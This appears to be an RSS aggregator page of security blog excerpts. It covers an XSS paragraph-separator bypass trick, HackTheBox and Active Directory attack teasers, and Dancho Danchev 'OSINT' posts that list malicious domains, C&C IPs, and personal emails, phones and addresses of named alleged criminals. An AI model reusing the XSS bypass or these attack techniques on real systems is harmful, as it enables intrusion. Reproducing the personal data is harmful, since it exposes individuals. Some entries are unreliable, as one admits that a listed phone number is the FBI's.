    Gareth Heyes가 재미있는 XSS 트릭을 하나 공유했는데요. Browser가 이를 처리하는 방식을 잘 생각해보면, 여러 형태로 우회하는데 사용할 수 있을 것 같단 느낌이 들었습니다. 간단한 내용이니 한번 같이 살펴보시죠 😎 U+2029 XSS #!@*%
alert(1) 일반적으로 위와 같은 생긴 코드를 눈으로 본다면 절대 실행되지 않을거라 생각하실겁니다. 그럼 한번 복사해서 브라우저에 붙여넣어볼까요? ??!?!? 네 alert이 발생합니다. 이는 $와 alert 사이에 있는 특수문자 즉 Paragraph Separator로 인해 브라우저가 이를 잘라서 인식했기 떄문에 동작합니다.
    개발자만? 아니 우리도 스크래치 패드 필요해! Boop!
    저는 종종 재미있는 앱이 있을지 앱스토어를 둘러보곤 합니다. 그러던 중 보안 테스팅에서 쓸만할 것 같은 도구를 찾아 이번 연휴동안 사용해보고, 괜찮다고 느껴서 블로그를 통해 공유해봅니다. 바로 Boop 입니다. Boop Boop는 개발자를 위한 scratch pad라고 생각하시면 좋습니다. 코드나 여러가지 데이터 등을 작성/수정하면서 쉽게 치환 등을 기능을 사용할 수 있는 작은 에디터입니다. 공식 Github에서도 아래와 같이 소개하고 있습니다. A scriptable scratchpad for developers. In slow yet steady progress. Boop에서 CMD+b를 눌러 action 리스트를 불러옵니

  • Open

    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry including me as an individual including my personal blog and all the socially-oriented work and contributors that I've made to the industry during the past ten years? If an image is worth a thousand words consider going through these images which I just found and took photos of and guess what - brace yourselves for the ultimate reality where I've officially spend over two decades actively working and researching the security industry. What's my idea to publish these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )

  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis

  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!

  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged both font, favicon and other less-commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )

  • Open

    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here including the technical details here which I produced for https://whoisxmlapi.com here including the following Maltego technical details video demonstration video: Enjoy!

  • Open

    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Due to this, it’s only natural for one of the most commonly asked questions being how websites are usually hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.

  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )

  • Open

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.
  • Open

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: aim:goim?screenname=youngglobeman&message=Hello+Are+you+there? aim:goim?screenname=yeezz0r&message=Hello+Are+you+there? aim:goim?screenname=xkyroutx&message=Hello+Are+you+there? aim:goim?screenname=wisie459&message=Hello+Are+you+there? aim:goim?screenname=whailen&message=Hello+Are+you+there? aim:goim?screenname=wgrumpke&message=Hello+Are+you+there? aim:goim?screenname=verbal0g&message=Hello+Are…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: 999008 9773639 974763 97254007 95211861 92754913 914506 89531566 8923240 86958674 802820 777726 74623265 7444304 690033 6666666 637321 62527577 598629 59838986 56714884 56327073 5556665 517196 48721062 47564547 4545 44203686 41781 3727374 362563 35 348140 33342322 332163 330332251 327539466 320455282 320100851 319326887 31485639 304060 29457002 288687540 288670074 266472842 26633491 264975608 2482045 236790331 230406 222567486 222409185 22063094 219747908 21386767 213201784 212719246 19457815 193200333 1881621 179251032 178954300 178832228 178420526 178210999 178101166 178020075 177541908 177507739 177394922 177016428 176824746 176531816 175688952 175596058 175521773 175350857 175308348 175157730 174902318 174760817 174537112 174511919 174445299 173846049 173838529 173767788 17359522 173387414 173299970 173254582 173019781 173002204 172674035 172476811 172290141 172252866 172021743 171975533 171805992 1715300002 171468368 171440228 170627352 170324565 170036758 169769760 169243371 169220281 169006693 168834059 168769080 168675160 168595955 168495889 168422846 168413916 167927175 167897380 167636937 167023436 166657595 166581197 166407706 165969755 165638624 165546617 164872312 164165878 164008345 162852265 1601617 158807983 15652907 154866004 152616 150860495 139736678 130915854 11402050 1111111 10966997 107021 105233239 103363810 100631 100161 Stay tuned!
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: shadow@shadowcrew[.]com idline@ziplip[.]com vengeance_1@ziplip[.]com cracker81@ziplip[.]com den5013@ziplip[.]com onthefringe@ziplip[.]com midhack@ziplip[.]com toastypimp@yahoo[.]com fakeid@ziplip[.]com anonraider@hotmail[.]com KsnowyInc@ziplip[.]com spookycat911@ziplip[.]com Necromancer01@ziplip[.]com script4dumps@ukr[.]net dominican@ziplip[.]com rcwizard@ziplip[.]com CAYMAN@Veg…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: 61[.]153[.]225[.]253 61[.]156[.]17[.]164 61[.]159[.]174[.]31 216[.]12[.]218[.]213 61[.]172[.]195[.]167 1[.]3[.]5[.]112 61[.]175[.]211[.]198 64[.]82[.]92[.]118 218[.]62[.]16[.]38 61[.]151[.]251[.]199 61[.]158[.]185[.]39 213[.]98[.]75[.]135 5[.]3[.]2[.]34 211[.]147[.]61[.]151 64[.]82[.]91[.]117 212[.]181[.]134[.]31 194[.]226[.]242[.]33 217[.]126[.]111[.]6 61[.]172[.]247[.]85 212[.]57[.]166[…
    The Evolution of Encrypted IM Messenging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue fake tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue fraudulent and malicious tech support scam domains include: 0120-hfjkahgfu-238[.]cf 1-800-my-apple[.]org 1serversupport[.]com 2serversupport[.]com 3serversupport[.]com 3stepremoval[.]com 4serversupport[.]com 5serversupport[.]com 6serversupport[.]com 7serversupport[.]com 8serversupport[.]com 9inchmonster[.]us 9serversupport[.]com 11serversupport[.]com 22serversupport[.]com 24-7helpline[.]co[.]uk 24hour-apple-support[.]org 24techhelp[.]com 24x7livesolution[.]com 33host[.]net 33serversupport[.]com 44serversupport[.]com 55serversupport[.]com 66serversupport[.]com 77serversupp…
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on Iran's based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: Name: Mohammad Sagegh Ahmadzadegan Handle: Nitrojen26 Email: nitr0jen26@asia[.]com; Nitrojen26@yahoo[.]com; me@sadahm[.]net Web Site: hxxp://sadahm[.]com Social Media Accounts: https://twitter[.]com/nitrojen26 Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer in-depth and practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. shy4angels@gmail[.]com shahzadsmb@gmail[.]com khizarh11@yahoo[.]com khizarhayat[.]jaffri@yahoo[.]com muhammadkhizar[.]hayatjaffri@yahoo[.]com mygreentree59@yahoo[.]com khizar14hayat@gmail[.]com muhammadkhizarhayatjaffri@yahoo[.]com threatcc@gmail[.]com mujtaba@forwarderz[.]com syedaliraza940@gmail[.]com raza[.]zaidi92@yahoo[.]com kool_boy92@hotmail[.]com s[.]alirz92@gmail[.]com alimohsin228@gmail[.]com mohsinrazaamiri@gmail[.]com alimohsin228@yahoo[.]com amestypezx@yahoo[.]com mohsin@forwarderz[.]com great_guy1102002@yahoo[.]com support@secondeyesolution[.]com info@forwarderz[.]com forwarderz@yahoo[.]com forwarderzlive@google[.]com forwarderzlive@hotmail[.]com support@secondeyehost[.]com Sample Web sites known to have been used by Forwarderz and  SecondEye Solution:  hxxp://secondeyesolution[.]su hxxp:// secondeyesolution[.]ch hxxp:// secondeyesolution[.]ru hxxp:// secondeyesolution[.]com hxxp:// forwarderz[.]com hxxp:// secondeyehost[.]com Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels including actual currently active names of RATs (Remote Access Tools) and trojan horses wit the idea to assist everyone in their cyber attack and cyber attribution campaigns where the C&C (Command and Control) communications channels which I'll share exclusive rely and use static and dynamic DNS and IP providers for the actual C&C infrastructure which is a common TTP (Tactics Techniques and Procedures) for this type of malicious software releases. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns[.] Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[…
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's  Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: m0stagim@gmail[.]com mtn97[.]hacker@yahoo[.]com si13nt_si13nt@yahoo[.]com midia595@yahoo[.]com Dead[.]Zone@att[.]net n0_sec@yahoo[.]it MagicC0d3r@gmail[.]com Faghat_be_khatere_to6000@yahoo[.]com raminshahkar73@yahoo[.]com nitr0jen26@asia[.]com Lord[.]private@ymail[.]com mehdy007@hotmail[.]fr plus[.]ashiyane@gmail[.]com pashe_kosh9@yahoo[.]com omid[.]ghaffarinia@gmail[.]com Pashekosh8@gmail[.]com pashe_kosh8@yahoo[.]com Sun[.…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[.]…
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers,   I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: 008i[.]com 008k[.]com 00hq[.]com 010402[.]com 05p[.]com 0calories[.]net 0cat[.]com 0cj[.]net 100gal[.]net 100sexlinks[.]com 101lottery[.]com 1089288654 10money[.]us 123keno[.]com 130[.]94[.]72[.]17 143fuck[.]com 157[.]238[.]62[.]14 171203[.]com 193[.]125[.]201[.]50 195[.]190[.]118[.]140 195[.]225[.]176[.]14 195[.]225[.]176[.]31 195[.]225[.]177[.]13 195[.]225[.]177[.]8 198[.]65[.]164[.]168 198[.]65[.]164[.]170 198[.]65[.]164[.]171 1check[.]us 1cost[.]us 1-domains-…
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns in the context of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: Mobile: +380993082660 Phone: 1-800-225-5324 which is actually the phone number of the FBI Personal email address accounts: yarik45@gmail[.]com, yaroslav2468@mail[.]ru Online handles: Yarik45, Yaroslav2468 ICQ: 635995970 including the following Web site which is he known to have been offering around…
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )

  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
    컬리넌 로그 #26입니다. XXE 항목 추가하였습니다. 보통 컬리넌에 여러개 이력이 누적되면 올리려곤 하는데, 이번에는 텀이 좀 길어져서 로그로 올려봅니다. XXE 내용 중 대응방안 쪽은 OWASP가 워낙 잘 정리해서 거의 링크 하나로 대체된 상태인데, 요건 제가 따로 한번 더 자세히 정리해서 업데이트하도록 할게요 😅 Add XXE (XML External Entity)
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns. mlibo[.]ml blibo[.]ga azll[.]cf azlll[.]cf lzll[.]cf jlll[.]cf elll[.]cf lllib[.]cf tsll[.]cf ulll[.]tk tlll[.]cf libt[.]ga libk[.]ga libf[.]ga libe[.]ga liba[.]gq libver[.]ml ntll[.]tk ills[.]cf vtll[.]cf clll[.]tk stll[.]tk llii[.]xyz lill[.]pro eduv[.]icu univ[.]red unir[.]cf unir[.]gq unisv[.]xyz unir[.]ml unin[.]icu unie[.]ml unip[.]gq unie[.]ga unip[.]cf nimc[.]ga nimc[.]ml savantaz[.]cf unie[.]gq unip[.]ga unip[.]ml unir[.]ga untc[.]me jhbn[.]me unts[.]me uncr[.]me lib-service[.]com unvc[.]me untf[.]me nimc[.]cf anvc[.]me ebookfafa[…
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns. Name: Behrooz Kamalian Postal address: Tajrish Sq, Fana Khosro St,Amir Salam Alley,No 22, Ashiyane ICT Company Phone number: 22727284-5 Fax number: 22727283 email: nima.salehi@yahoo.com Technical Handle: nic36928h37 Name: Behrooz Kamalian email: nima.salehi@yahoo.com Domain Name: ashiyane.ir Legal Holder: Behrooz Kamalian Postal address: Unit 28, Floor Seven, 36 Building , Daneshvar alley, Jamalzadeh St. , Enghelab Sq. Tehran, IR 1336925748 Phone number: +98.2166935551 Fax number: +98.2166930577 Admin Contact: nic36928h37 Technical Contact: nic36928h37 Domain Name Server1: ns1.ashiyane.org Domain Name Server2: ns2.ashiyane.org Request Date: 29 December 2005 Last Verification: 21 September 2006 Reseller: Govah Tadbir Rayaneh Postal address: Unir 1 , 1th Floor , No.376 , North Bahar St . Phone number: +98 21 88849956-7 Fax number: +98 21 88307682 email: info@tadbir.ir
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs: hxxp://109[.]123[.]78[.]10 hxxp://66[.]54[.]51[.]172 hxxp://108[.]161[.]128[.]103 hxxp://195[.]210[.]29[.]237 hxxp://5[.]35[.]249[.]46 hxxp://5[.]159[.]57[.]195 hxxp://206[.]210[.]70[.]175 hxxp://88[.]80[.]187[.]139 hxxp://188[.]93[.]174[.]136 hxxp://130[.]133[.]3[.]7 hxxp://162[.]144[.]79[.]192 hxxp://79[.]110[.]90[.]207 hxxp://72[.]18[.]204[.]17 hxxp://212[.]129[.]13[.]…

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you light enjoy it. 📌 TL;DR ZAP has powerful scripting engine and automation Burpsuite has powerful scanning engine and That’s Early adopter. They’re both really cool tools. 🔍 Compare ZAP Burpsuite Proxy O , HTTP/1.1 O🎖 HTTP/1.1 , HTTP/2 Paasive Scan O O Active Scan O O Scan Configuration O🎖, Easy, Detail control O Scan Results O, Mapping more information O, Detail results Live Scan O, ATTACK Mode O, Live tasks Manage scope O, Detail O, Easy Manage workspace O O Spidering O, Spider, Ajax Spider O, Powerful Crawler Extensions (Addons) O, High quality O🎖, High quality, Many features Scripting O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc O, Python, Ruby Performance O, Fast, bu…
    XXE (XML External Entity)
    🔍 Introduction XXE(XML External Entity)는 XML을 Parsing하여 사용하는 서비스에 악의적인 XML 구문을 Parsing하도록 유도하여 공격자가 의도한 동작을 수행하도록 하는 공격입니다. 기본적으로 XML Parser가 위치한 곳에서 부터 영향력이 발생하기 때문에 가볍게는 SSRF 같이 내부망 접근부터, RCE까지 큰 영향력을 가질 수 있습니다. 🗡 Offensive techniques Detect 심플하겐 XML Parse가 동작하는 구간을 찾아야합니다. 소스코드를 볼 수 있는 상황이라면 코드에서 검색하는 것이 가장 빠르고 효율적이며, 소스코드 없이 순수하게 동작만으로만 봐야한다면 .xml 파일을 인자값으로 받거나, 에러에서 XML Parsing 관련 에러를 뱉는 구간을 위주로 점검해야합니다.

  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析
    1、漏洞背景 2、漏洞简介 3、分析环境 3.1、提取漏洞模块 3.2、关闭ASLR 4、漏洞复现 5、Internet Explorer DOM树的结构 5.1、以文本为中心的设计 5.2、增加复杂性层次结构 5.3、原来的DOM没有经过封装 6、漏洞原理分析 6.1、逆向mshtml.dll中此漏洞的相关类 6.1.1、CSpliceTreeEngine 6.1.2、CTreeNode 6.1.3、CTreePos 6.1.4、CTreeDataPos 6.1.4.1、Tree::TextData 6.1.4.2、CTxtPtr 6.2、漏洞PoC所对应的DOM树 6.3、漏洞产生的根本原因分析 7、漏洞修复 8、参考链接 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威胁分析团队发现的4个在野利用的0day漏洞的详细信息。Google Chrome中的CVE-2021-21166和CVE-2021-30551,Internet Explorer中的CVE-2021-33742和Apple Safari中的CVE-2021-1879。 2021年4月,TAG发现了一项针对亚美尼亚用户的攻击活动,该活动通过恶意的Office文档调用Internet Explorer加载远程的恶意Web页面来利用Internet Explorer渲染引擎中…

  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )

  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
